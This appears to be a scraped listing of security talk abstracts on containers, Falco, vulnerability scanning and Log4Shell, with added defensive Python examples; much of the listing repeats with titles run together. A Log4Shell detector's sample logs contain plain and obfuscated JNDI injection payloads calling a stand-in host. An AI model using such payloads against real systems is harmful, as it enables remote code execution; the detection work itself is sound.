This presentation covers my research into the comparative efficacy assessment of various free and open source intrusion detection and analysis platforms and methods as applied to traditional vs. Linux container networks.
Object Broker Infrastructure for Wide Area Networks (Vaidas Brundza)
This document summarizes the OBIWAN platform, a middleware platform that aims to make programming distributed applications easier. It does this by providing an object broker infrastructure, automatic replication of objects, distributed garbage collection, and a security framework. The platform is paradigm flexible and allows programmers to choose the programming model best suited to their application. It also details some of the key data structures and algorithms used in distributed garbage collection and security.
While there have been many improvements around securing containers, there is still a large gap in monitoring the behavior of containers in production. That is the reason we created Falco, the open source behavioral activity monitor for containerized environments.
Falco can detect and alert on anomalous behaviour at the application, file system and network level.
In this session we take a deep dive into Falco and cover the following points:
* How does behavioral security differ from existing security solutions like image scanning, seccomp, SELinux or AppArmor?
* How does Falco do its magic?
* What can Falco detect? Creating your own rules and customizing the existing ones for your Kubernetes applications.
* How to deploy Falco in your Kubernetes cluster?
* Reacting to security incidents: what can we do to stop attackers in real time?
* Post-mortem analysis and forensics on containers with Sysdig Inspect, even when the containers no longer exist!
The document discusses incident response in cyber-relevant time and the need for automation and standardization to enable faster response times. It introduces OpenC2 as an emerging open standard for command and control that aims to provide unambiguous machine-to-machine communication through a common language and protocols. OpenC2 focuses on the "acting" portion of cyber defense by coordinating defensive actions across different security systems through open specifications.
Ian Powers is seeking a position in information and cyber security. He has a Bachelor of Science in Cyber Security & Intelligence from Embry-Riddle Aeronautical University with a 3.833 GPA. His relevant coursework includes intro to cyber security, malware analysis, computer forensics, and networking security. He has experience attending security conferences and speaking on password security. Currently, he leads a cyber security group focused on competitions and gives lectures on security tools.
Implementing Active Security with Sysdig Falco - Barcelona Software Crafters (Néstor Salceda)
Woah! We have our application deployed in a cluster and are ready to manage our fleet of containers. And it is really awesome, we can scale them automatically! But, but... WTF?! What does this message about "File below a known binary directory opened for writing" mean? Which container opened a file under /bin for writing, among the other 9813 containers in my deployment?
When you are managing a Docker cluster with many nodes and containers, finding which one originated the alert can be cumbersome. Time matters: the faster we react to a security issue, the better we can avoid greater damage.
Automation is an important part of the DevSecOps mindset. In this talk we will learn how to implement custom playbooks with open source software and deploy them using serverless technology, building an active security system that uses Sysdig Falco to detect security threats.
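The two Falco talks above both hinge on the same mechanics: Falco fires a rule such as "Write below binary dir" and something has to turn that alert into a targeted response against the one pod that caused it. The block below is an added example (not Falco's code, nor the playbook code from either talk) showing that step: it parses alerts in the JSON shape Falco emits with json_output enabled, applies a priority threshold, and maps the rule name to a response. The field names (rule, priority, output_fields, k8s.ns.name, k8s.pod.name, container.id) are Falco's; the sample alerts, the PLAYBOOKS table and the action names (delete_pod, isolate_pod, notify_only) are constructed for this example.

```python
import json
from dataclasses import dataclass
from typing import List, Optional

# Falco priorities, most to least severe (real Falco names).
PRIORITIES = ["Emergency", "Alert", "Critical", "Error",
              "Warning", "Notice", "Informational", "Debug"]

# Hypothetical playbook table for this example: which response each Falco
# rule should trigger. The keys are Falco default rule names; the action
# names are invented here and would be bound to a serverless function.
PLAYBOOKS = {
    "Write below binary dir": "delete_pod",
    "Terminal shell in container": "isolate_pod",
}


@dataclass
class Response:
    action: str       # playbook to run
    namespace: str    # k8s.ns.name from the alert ("" if not on Kubernetes)
    pod: str          # k8s.pod.name ("" if not on Kubernetes)
    container: str    # container.id
    reason: str       # the Falco rule that fired


def at_least(priority: str, threshold: str) -> bool:
    """True if `priority` is as severe as `threshold` or more severe."""
    return PRIORITIES.index(priority) <= PRIORITIES.index(threshold)


def plan_response(alert_json: str, threshold: str = "Warning") -> Optional[Response]:
    """Turn one Falco JSON alert into a playbook decision.

    Returns None when the alert is below `threshold` or no playbook exists
    for the rule. When the alert carries no Kubernetes metadata there is no
    pod to act on, so the decision degrades to notify_only."""
    alert = json.loads(alert_json)
    rule = alert.get("rule", "")
    if not at_least(alert.get("priority", "Debug"), threshold):
        return None
    action = PLAYBOOKS.get(rule)
    if action is None:
        return None
    fields = alert.get("output_fields", {})
    pod = fields.get("k8s.pod.name") or ""
    if not pod:
        action = "notify_only"
    return Response(action=action,
                    namespace=fields.get("k8s.ns.name") or "",
                    pod=pod,
                    container=fields.get("container.id") or "",
                    reason=rule)


# Constructed sample alerts in Falco's JSON output shape (values are made up).
SAMPLE_ALERTS = [
    json.dumps({
        "output": "File below a known binary directory opened for writing ...",
        "priority": "Error",
        "rule": "Write below binary dir",
        "time": "2019-05-10T10:00:00.000000000Z",
        "output_fields": {
            "container.id": "3f2a9c1d8b77",
            "k8s.ns.name": "shop",
            "k8s.pod.name": "checkout-5c6d7f9b8-x2k4q",
            "fd.name": "/bin/ls",
            "proc.cmdline": "cp /tmp/ls /bin/ls",
        },
    }),
    json.dumps({
        "output": "A shell was spawned in a container with an attached terminal ...",
        "priority": "Notice",
        "rule": "Terminal shell in container",
        "time": "2019-05-10T10:01:00.000000000Z",
        "output_fields": {
            "container.id": "9a8b7c6d5e4f",
            "k8s.ns.name": "shop",
            "k8s.pod.name": "frontend-7d8e9f0a1-qq9zt",
            "proc.cmdline": "bash",
        },
    }),
    json.dumps({  # same rule, but fired on a plain Docker host: no pod to delete
        "output": "File below a known binary directory opened for writing ...",
        "priority": "Error",
        "rule": "Write below binary dir",
        "time": "2019-05-10T10:02:00.000000000Z",
        "output_fields": {"container.id": "0c1d2e3f4a5b", "fd.name": "/usr/bin/vi"},
    }),
]


def plan_all(alerts=SAMPLE_ALERTS, threshold: str = "Warning") -> List[Optional[Response]]:
    return [plan_response(a, threshold) for a in alerts]


if __name__ == "__main__":
    for decision in plan_all():
        print(decision)
```

The threshold matters in practice: "Terminal shell in container" fires at Notice in the default ruleset and is noisy in clusters where operators exec into pods, so a playbook that deletes or isolates on it should be opt-in rather than the default.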
Docker containers are the most popular containerisation technology. Used properly, they can increase the level of security compared to running the application directly on the host. On the other hand, some misconfigurations can lower the level of security or even introduce new vulnerabilities.
As delivered by Tim Mackey, Senior Technical Evangelist - Black Duck Software, at LinuxCon and ContainerCon in Berlin 2016.
Traditionally, when datacenter operators talk about application security, they've tended to focus on issues related to key management, firewalls and data access. By contrast, application developers have a security focus which is more aligned with code analysis and fuzzing techniques.
The reality is that secure application deployment principles extend from the infrastructure layer through the application and include how the application is deployed. With the prevalence of continuous deployment of micro-services, it is imperative to focus efforts on what attackers view as vulnerable, particularly in an environment where new exploits are being disclosed almost daily.
In this session we’ll present:
• How known vulnerabilities can make their way into production deployments
• How deployment of vulnerable code can be minimized
• How to determine the vulnerability status of a container
• How to determine the risk associated with a specific package
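Determining the vulnerability status of a container comes down to matching the image's package inventory against advisories and ranking what matches by risk. The block below is an added example of that matching step, not Black Duck's code or the tooling from the session. The inventory, the advisories, their identifiers (EXAMPLE-000x) and scores are all constructed; the version comparison is deliberately simplified to numeric components and is not the dpkg or rpm ordering a real scanner must use.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Advisory:
    package: str
    fixed_in: str    # first version that carries the fix
    cvss: float      # CVSS v3 base score (constructed values below)
    ident: str       # advisory identifier (constructed, not real CVE ids)


@dataclass
class Finding:
    package: str
    installed: str
    ident: str
    cvss: float
    fixed_in: str


def version_key(v: str) -> Tuple[int, ...]:
    """Simplified ordering: compare numeric runs left to right.
    Distro versioning (dpkg/rpm epochs, revisions, letter suffixes such as
    openssl 1.0.2g) is richer than this; use the distro comparator in production."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def is_vulnerable(installed: str, fixed_in: str) -> bool:
    """Installed version is affected when it sorts before the fixed version."""
    return version_key(installed) < version_key(fixed_in)


def assess_image(inventory: Dict[str, str], advisories: List[Advisory]) -> List[Finding]:
    """Match the image's installed packages against advisories.
    Returns findings sorted by CVSS, highest first, so the riskiest package
    in the image is the first line of the report."""
    findings = []
    for pkg, ver in inventory.items():
        for adv in advisories:
            if adv.package == pkg and is_vulnerable(ver, adv.fixed_in):
                findings.append(Finding(pkg, ver, adv.ident, adv.cvss, adv.fixed_in))
    return sorted(findings, key=lambda f: f.cvss, reverse=True)


def package_risk(findings: List[Finding], package: str) -> float:
    """Risk of one package: the highest CVSS among its open findings (0.0 if none)."""
    return max((f.cvss for f in findings if f.package == package), default=0.0)


# Constructed inventory, as you would get from `dpkg-query -W` inside the image.
IMAGE_INVENTORY = {
    "libxml2": "2.9.4",
    "curl": "7.52.1",
    "zlib1g": "1.2.11",
    "busybox": "1.30.1",
}

# Constructed advisory feed for this example.
ADVISORIES = [
    Advisory("libxml2", fixed_in="2.9.5", cvss=7.5, ident="EXAMPLE-0001"),
    Advisory("curl", fixed_in="7.52.2", cvss=9.8, ident="EXAMPLE-0002"),
    Advisory("zlib1g", fixed_in="1.2.8", cvss=8.1, ident="EXAMPLE-0003"),  # already fixed
    Advisory("openssh-server", fixed_in="7.4", cvss=7.0, ident="EXAMPLE-0004"),  # not installed
]


if __name__ == "__main__":
    for f in assess_image(IMAGE_INVENTORY, ADVISORIES):
        print(f"{f.package} {f.installed}: {f.ident} (CVSS {f.cvss}), fixed in {f.fixed_in}")
```

Two points the output makes concrete: an advisory for a package that is not in the image (openssh-server) contributes nothing, and a package already at or beyond the fixed version (zlib1g) is not a finding even though an advisory exists for it. That is why the inventory has to come from the image actually being deployed, not from the Dockerfile's intent.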
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team (Priyanka Aash)
With advanced cyber-actors evolving quickly and becoming more stealthy, it has become imperative to question the status quo of our existing cyber-operations. This session will outline how a case study and incident response led to changes in focus and philosophy and how that changed the structure of Defensive Cyber Operations.
(Source: RSA Conference USA 2017)
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
A department seminar I gave at the department of Software, Information Systems Engineering and Cyber, Ben-Gurion University.
Agenda:
- Ways for industry to consume academic research
- Example:
- provable software & security
- Analysis tools demos
- AVISPA & Tamarin Prover
- Advanced attacks/analysis/next steps
Under-reported Security Defects in Kubernetes Manifests (Akond Rahman)
This presentation discusses how frequently security defects are reported in Kubernetes manifests. The paper was presented at the ICSE EnCycris workshop in 2021.
OTechs Hacking and Penetration Testing (BackTrack/Kali) Training Course (Osman Suliman)
This document outlines a 30-hour training course on Kali Linux for system administrators, security professionals, and IT professionals. The course costs SD 3000 per trainee and covers topics such as installing and configuring Kali Linux, building test environments, the penetration testing lifecycle including reconnaissance, scanning, exploitation, and maintaining access, and reporting.
What Questions Do Programmers Ask About Configuration as Code? (Akond Rahman)
Presented at RCoSE2018. Summary: When working with tools like Puppet, programmers ask a lot of questions related to syntax, feasibility, and security. Despite advancements in Puppet, some fundamental challenges such as feasibility, installation, and security persist. Preprint: https://akondrahman.github.io/papers/rcose2018_cac.pdf.
Vulnerability Detection Based on Git History (Kenta Yamamoto)
This document discusses a methodology for detecting vulnerabilities in software based on analysis of the project's Git history. It proposes an approach called HVD that considers whether lines of code were added or removed in code changes, which could improve precision over existing techniques. An evaluation using a dataset of over 350,000 commits found that HVD increased the area under the precision-recall curve by 18.8% compared to a baseline that ignores line additions and removals. Features related to computer resources like memory, CPU and networking were found to most significantly contribute to the classification model. The study demonstrates that automatically detecting vulnerabilities from Git data can produce results aligned with human intuition.
Monitoring & Securing Microservices in Kubernetes (Michael Ducy)
Applications running in containers provide a myriad of choices to the developer. But how do you provide the services needed to monitor and secure these applications when they run on platforms such as Kubernetes? This presentation covers some common-sense principles for monitoring and securing your Kubernetes-based applications.
Design and Implementation of Data Encryption Software (Ayanda Demilade)
This document presents the design and implementation of data encryption software by Ayanda Demilade Isaac. It discusses the background and need for data encryption. The aim is to compare the encryption techniques of Data Encryption Standard (DES), Triple DES (TDES) and Rijndael, and determine which is more efficient. A literature review analyzes the works, limitations and vulnerabilities of each technique. The research methodology involves a comparative analysis of the encryption algorithms. The results show plain text and cipher text figures. It concludes that Rijndael is more efficient than DES and remains unbroken. Future work could benchmark encryption of different media types like video and audio using Rijndael.
Outpost24 webinar: mastering container security in modern-day DevOps (Outpost24)
Our cloud security expert examines the security challenges that come with container adoption and unpacks the key steps required to integrate and automate container assessment into the DevOps cycle, helping developers build and deploy cloud-native apps at speed while keeping one eye on security.
In recent years the traditional application monolith has broken down into a hefty collection of micro-services, increasing the attack surface. We will look at how this multiplies the entry points into the complex modern application ecosystem. The modern security tester needs a range of skills to pen-test such apps, including an understanding of containers, to successfully break or defend them.
We then tie this to the fast-paced DevOps life cycles of applications and explore the challenges of scaling security for such applications across the organization.
The webinar therefore discusses traditional and newer methods of pen-testing web applications, illustrating how changing business requirements and Agile life cycles affect security testing for modern applications.
Key takeaways:
- What do traditional pen-testing/security-testing techniques entail?
- How is the application landscape changing, and how does that affect security testing?
- What are the key essentials for testing modern applications?
- What can be done to scale security assessments (testing) for modern, Agile life cycles?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat intelligence can be expensive and sometimes nothing more than IoCs or blacklists. In this talk, Endgame's threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of data and open-source tools to "hunt on the cheap." They'll explain how to: retrieve attackers' tools from globally distributed honeynets that look like your organization or a juicy launching point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
Virtual Machine Introspection - Future of the Cloud (Tjylen Veselyj)
In this presentation I talk about features of VMI technology that are vital for malware analysis, intrusion detection and attack prevention in virtualized environments. This presentation is part of my Ph.D. work and contains a summary of the state of VMI in 2013.
Finding Diversity In Remote Code Injection Exploits (amiable_indian)
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an edit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
VERIGRAPH: A pre-deployment verification service for Virtualized Network Functions (aka NFV virtual appliances) running on OpenStack with OPNFV.
Formal Methods: rigorous mathematical methods based on mathematical models for analysing (computer-based) systems
Formal Verification: applied to SDN/NFV-based networks
Verify a formal network model satisfies some invariants or network policies (e.g., absence of loops and black holes, reachability, security policies, etc.)
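VeriGraph encodes the network and the virtual functions as constraints for an SMT solver; the block below is a much simpler explicit-state check, added here as an example and not VeriGraph's code, to make concrete what "the model satisfies the invariants" means for the policies listed above. It takes a forwarding model (per node, the next hop toward each destination) and checks each source/destination pair for loops, black holes and reachability, plus a security policy of the waypoint kind: traffic from a given source to a given destination must traverse a named function (here a firewall). The topology, node names and policies are constructed.

```python
from typing import Dict, List, Tuple

# Forwarding model: node -> {destination: next_hop}. Reaching `dst` ends the walk.
Forwarding = Dict[str, Dict[str, str]]
Pair = Tuple[str, str]
Violation = Tuple[str, str, str, List[str]]   # (src, dst, kind, path)


def check(fwd: Forwarding, src: str, dst: str) -> Tuple[str, List[str]]:
    """Walk the next hops for `dst` starting at `src`.

    Returns ("ok", path) when dst is reached, ("loop", path) when a node
    repeats, or ("blackhole", path) when a node has no route for dst."""
    path, seen, node = [src], {src}, src
    while node != dst:
        nxt = fwd.get(node, {}).get(dst)
        if nxt is None:
            return "blackhole", path
        path.append(nxt)
        if nxt in seen:
            return "loop", path
        seen.add(nxt)
        node = nxt
    return "ok", path


def verify(fwd: Forwarding, pairs: List[Pair],
           waypoints: Dict[Pair, List[str]]) -> List[Violation]:
    """Check every (src, dst) pair for loop-freedom, absence of black holes
    and reachability, then check the waypoint policy: every node listed in
    waypoints[(src, dst)] must lie on the path. Returns all violations."""
    violations: List[Violation] = []
    for src, dst in pairs:
        status, path = check(fwd, src, dst)
        if status != "ok":
            violations.append((src, dst, status, path))
            continue  # a broken path cannot satisfy a waypoint policy either
        for wp in waypoints.get((src, dst), []):
            if wp not in path:
                violations.append((src, dst, f"bypasses {wp}", path))
    return violations


# Constructed topology: a web tier and a guest network reaching a database
# through a core switch; fw is a firewall function; r1/r2 and "ext" exist to
# exhibit a loop and a black hole.
FWD: Forwarding = {
    "web":   {"db": "fw", "ext": "core"},
    "fw":    {"db": "core"},
    "core":  {"db": "db"},          # no entry for "ext": black hole
    "guest": {"db": "core"},        # goes straight to core, skipping fw
    "r1":    {"ext": "r2"},
    "r2":    {"ext": "r1"},         # r1 <-> r2 forwarding loop
}
PAIRS: List[Pair] = [("web", "db"), ("guest", "db"), ("r1", "ext"), ("web", "ext")]
WAYPOINTS: Dict[Pair, List[str]] = {("web", "db"): ["fw"], ("guest", "db"): ["fw"]}


if __name__ == "__main__":
    for src, dst, kind, path in verify(FWD, PAIRS, WAYPOINTS):
        print(f"{src} -> {dst}: {kind} via {' -> '.join(path)}")
```

The guest-to-db result is the one that matters for security: the path is loop-free and reaches the database, so a pure reachability check passes it, yet it violates the policy because the firewall is never traversed. That is why "security policies" appear alongside loops and black holes in the list of invariants, and why a pre-deployment check has to evaluate all of them on the same model.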
OpenDaylight Brisbane User Group - OpenDaylight Security (David Jorm)
The document discusses OpenDaylight's approach to security. It begins with an introduction to the speaker and an overview of the SDN attack surface. It then discusses recent OpenDaylight vulnerabilities like issues with Netconf and host tracking. Defensive technologies like Topoguard and Security-mode ONOS are presented. The document also covers security response best practices for open source projects and secure engineering practices. It provides an assessment of OpenDaylight's current security status and outlines a vision for improved security response and engineering.
This document summarizes a report by Kaspersky Lab on evolving malware attacks originating in Syria. Malicious actors are using social engineering techniques like Skype messages, Facebook posts, and YouTube videos to distribute malware disguised as security programs. The malware payloads identified include remote access Trojans (RATs) like ShadowTech RAT and Dark Comet RAT. Over 100 malware samples have been found targeting activists and others in Syria, Lebanon, Turkey and other countries. The actors operate from locations including Syria, Russia, and Lebanon, and are constantly evolving their methods.
Malware analysis, threat intelligence and reverse engineering (bartblaze)
In this presentation, I introduce the concepts of malware analysis, threat intelligence and reverse engineering. Experience or knowledge is not required.
Feel free to send me feedback via Twitter (@bartblaze) or email.
Blog post: https://bartblaze.blogspot.com/2018/02/malware-analysis-threat-intelligence.html
Labs: https://github.com/bartblaze/MaTiRe
Mind the disclaimer.
The Log4Shell Vulnerability - explained: how to stay secure (Kaspersky)
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228, or "Log4Shell", is an RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control of an affected system. The vulnerability has been ranked 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
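The webinar abstract above notes that attackers were already scanning widely for Log4Shell. Finding those attempts in your own request logs is harder than grepping for "jndi", because Log4j resolves nested lookups such as ${lower:j} or ${::-n} before the JNDI lookup runs, so the literal string need never appear. The block below is an added example, not Kaspersky's or the Log4j project's code: it collapses the nested lookup forms Log4j 2 supports (lower, upper, and the default-value syntax ${name:-value}) until the string stops changing, then checks for a ${jndi: lookup. The log lines are constructed; the regexes and the normalisation loop are this example's own and cover the common obfuscations rather than every lookup Log4j offers.

```python
import re
from typing import List, Tuple

# An innermost lookup: "${" ... "}" whose body contains no further brace,
# so it can be resolved without looking at anything nested inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# The lookup that matters, matched after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(m) -> str:
    """Resolve one innermost lookup the way Log4j 2 would, for the forms
    attackers use to hide 'jndi'. Anything else is left untouched."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                       # keep: this is what we are hunting
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()     # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()     # ${upper:n} -> N
    if ":-" in body:
        return body.split(":-", 1)[1]           # ${::-d}, ${env:NOPE:-i} -> default value
    return m.group(0)                           # e.g. ${date:yyyy}: unknown, keep as is


def normalize(text: str, max_rounds: int = 25) -> str:
    """Repeatedly resolve innermost lookups until nothing changes (bounded,
    so a pathological input cannot spin)."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(text: str) -> bool:
    return _JNDI.search(normalize(text)) is not None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (index, normalised line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed access-log lines: a benign request, a plain payload, an
# obfuscated payload, and a benign line that uses a harmless Log4j lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://evil.example/a}"',
    '10.0.0.7 - - "GET /?x=1 HTTP/1.1" 404 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://evil.example/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "-" "report for ${date:yyyy-MM-dd}"',
]


if __name__ == "__main__":
    for idx, shown in scan_lines(SAMPLE_LOGS):
        print(f"line {idx}: {shown}")
```

Run this over URL-decoded text: payloads frequently arrive percent-encoded (%24%7B for ${), and a check on the raw line would miss them. Detection of this kind finds attempts, not compromises; it complements, and does not replace, the patching the abstract calls for.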
This document discusses container security, providing a brief history of containers, security benefits and challenges of containers, and approaches to container vulnerability management and responding to attacks. It notes that while containers are not new, their adoption has increased rapidly in recent years. The document outlines security advantages like smaller surface areas but also challenges like managing vulnerabilities across many moving parts. It recommends strategies like using official images, hardening hosts, scanning for vulnerabilities, and practicing incident response for containers.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The key point is that while firewalls provide some security, a holistic security program is needed to fully prevent, detect, and respond to threats.
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
A department seminar I gave at the department of Software, Information Systems Engineering and Cyber, Ben-Gurion University.
Agenda:
- Ways for the Industry to consume an academic research
- Example:
- provable software & security
- Analysis tools demos
- Avispa & Tamarin Prover
- Advanced attacks/analysis/next steps
Under-reported Security Defects in Kubernetes ManifestsAkond Rahman
This presentation discusses how frequently security defects are reported in Kubernetes manifests. The paper was presented at the ICSE EnCycris workshop in 2021.
OTechs Hacking and Penetration Testing (BackTrack/Kali) Training CourseOsman Suliman
This document outlines a 30-hour training course on Kali Linux for system administrators, security professionals, and IT professionals. The course costs SD 3000 per trainee and covers topics such as installing and configuring Kali Linux, building test environments, the penetration testing lifecycle including reconnaissance, scanning, exploitation, and maintaining access, and reporting.
What Questions Do Programmers Ask About Configuration as Code?Akond Rahman
Presented at RCoSE2018. Summary: When working with tools like Puppet, programmers ask a lot of questions related to syntax, feasibility, and security. Despite advancements in Puppet, some fundamental challenges such as feasibility, installation, and security persist. Preprint: https://akondrahman.github.io/papers/rcose2018_cac.pdf.
Vulnerability Detection Based on Git HistoryKenta Yamamoto
This document discusses a methodology for detecting vulnerabilities in software based on analysis of the project's Git history. It proposes an approach called HVD that considers whether lines of code were added or removed in code changes, which could improve precision over existing techniques. An evaluation using a dataset of over 350,000 commits found that HVD increased the area under the precision-recall curve by 18.8% compared to a baseline that ignores line additions and removals. Features related to computer resources like memory, CPU and networking were found to most significantly contribute to the classification model. The study demonstrates that automatically detecting vulnerabilities from Git data can produce results aligned with human intuition.
Monitoring & Securing Microservices in KubernetesMichael Ducy
Application running in containers provide a myriad of choices to the end developer. But how do you provide the necessary services to monitor and secure these applications running in platforms such as Kubernetes. This presentation covers some common sense principles to monitor and secure your Kubernetes based applications.
For further details contact:
N.RAJASEKARAN B.E M.S 9841091117,9840103301.
IMPULSE TECHNOLOGIES,
Old No 251, New No 304,
2nd Floor,
Arcot road ,
Vadapalani ,
Chennai-26.
www.impulse.net.in
Email: ieeeprojects@yahoo.com/ imbpulse@gmail.com
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREAyanda Demilade
This document presents the design and implementation of data encryption software by Ayanda Demilade Isaac. It discusses the background and need for data encryption. The aim is to compare the encryption techniques of Data Encryption Standard (DES), Triple DES (TDES) and Rijndael, and determine which is more efficient. A literature review analyzes the works, limitations and vulnerabilities of each technique. The research methodology involves a comparative analysis of the encryption algorithms. The results show plain text and cipher text figures. It concludes that Rijndael is more efficient than DES and remains unbroken. Future work could benchmark encryption of different media types like video and audio using Rijndael.
Outpost24 webinar mastering container security in modern day dev opsOutpost24
Our cloud security expert examines the security challenges that come with container adoption and unpack the key steps required to integrate and automate container assessment into the DevOps cycle to help developers build and deploy cloud native apps at speed whilst keeping one eye on security.
In the recent years, the traditional application monolith has broken down into a hefty chunk of micro-services thereby increasing the attack surface. We will look at how this increases the entry points into the complex modern day application ecosystem. The modern security tester needs various skills to pen-test such apps including the understanding of containers to successfully break or defend such applications.
When we tie this with the fast paced devOps life cycles for applications and explore the challenges when scaling security for such applications across the organization.
Hence, this webinar discusses traditional and relatively newer methods of Pen-testing web applications. Thereby illustrating how the changing business requirements and Agile life cycles for applications affect Security testing for modern applications.
Key Takeaways:
- what do the traditional Pen testing/Security testing Techniques entail?
- How is the landscape for Applications changing and how it affects security testing?
- What are the key essentials for testing modern applications?
- what can be done to scaling Security Assessments(Testing) for Modern & Agile life cycles?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat Intelligence can be expensive and sometimes
nothing more than IoCs or blacklists. In this talk, Endgame’s threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of
data and open-source tools to “hunt on the cheap.” They’ll explain how to: retrieve attackers’ tools from globally distributed honeynets that look like your organization or a juicy launching
point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own
networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
Virtual Machine Introspection - Future of the CloudTjylen Veselyj
In this presentation I'm talking about feature of VMI technology that are vital for malware analysis, intrusion detection and attack prevention in virtualized environment. This presentation is part of my Ph.D. work and contain summary of VMI state in 2013.
Finding Diversity In Remote Code Injection Exploitsamiable_indian
1. The document analyzes the diversity among remote code injection exploits by collecting exploit samples from network traces, extracting and emulating shellcodes, and clustering the shellcodes based on an exedit distance metric.
2. It finds that exploits can be grouped into families based on the vulnerability targeted. The LSASS and ISystemActivator exploit families show subtle variations among related exploits, while RemoteActivation exploits exhibit more diversity.
3. Analyzing exploit phylogenies reveals code sharing among families and subtle variations within families, providing insights into the emergence of polymorphism in malware payloads.
VERIGRAPH: A pre-deployment verification service for Virtualized Network Functions (aka NFV virtual appliances) running on OpenStack with OPNFV.
Formal Methods: rigorous mathematical methods based on mathematical models for analysing (computer-based) systems
Formal Verification: applied to SDN/NFV-based networks
Verify a formal network model satisfies some invariants or network policies (e.g., absence of loops and black holes, reachability, security policies, etc.)
OpenDaylight Brisbane User Group - OpenDaylight SecurityDavid Jorm
The document discusses OpenDaylight's approach to security. It begins with an introduction to the speaker and an overview of the SDN attack surface. It then discusses recent OpenDaylight vulnerabilities like issues with Netconf and host tracking. Defensive technologies like Topoguard and Security-mode ONOS are presented. The document also covers security response best practices for open source projects and secure engineering practices. It provides an assessment of OpenDaylight's current security status and outlines a vision for improved security response and engineering.
This document summarizes a report by Kaspersky Lab on evolving malware attacks originating in Syria. Malicious actors are using social engineering techniques like Skype messages, Facebook posts, and YouTube videos to distribute malware disguised as security programs. The malware payloads identified include remote access Trojans (RATs) like ShadowTech RAT and Dark Comet RAT. Over 100 malware samples have been found targeting activists and others in Syria, Lebanon, Turkey and other countries. The actors operate from locations including Syria, Russia, and Lebanon, and are constantly evolving their methods.
Malware analysis, threat intelligence and reverse engineering (bartblaze)
In this presentation, I introduce the concepts of malware analysis, threat intelligence and reverse engineering. Experience or knowledge is not required.
Feel free to send me feedback via Twitter (@bartblaze) or email.
Blog post: https://bartblaze.blogspot.com/2018/02/malware-analysis-threat-intelligence.html
Labs: https://github.com/bartblaze/MaTiRe
Mind the disclaimer.
The Log4Shell Vulnerability – explained: how to stay secure (Kaspersky)
